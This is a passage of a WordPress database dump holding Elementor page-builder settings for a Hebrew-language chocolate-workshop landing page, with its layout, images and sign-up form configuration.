invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(363,89,'_elementor_version','0.4'),(365,90,'_wp_page_template','elementor_canvas'),(366,90,'_elementor_edit_mode','builder'),(367,90,'_elementor_template_type','post'),(368,90,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"label_typography_typography\":\"custom\",\"label_typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"},\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 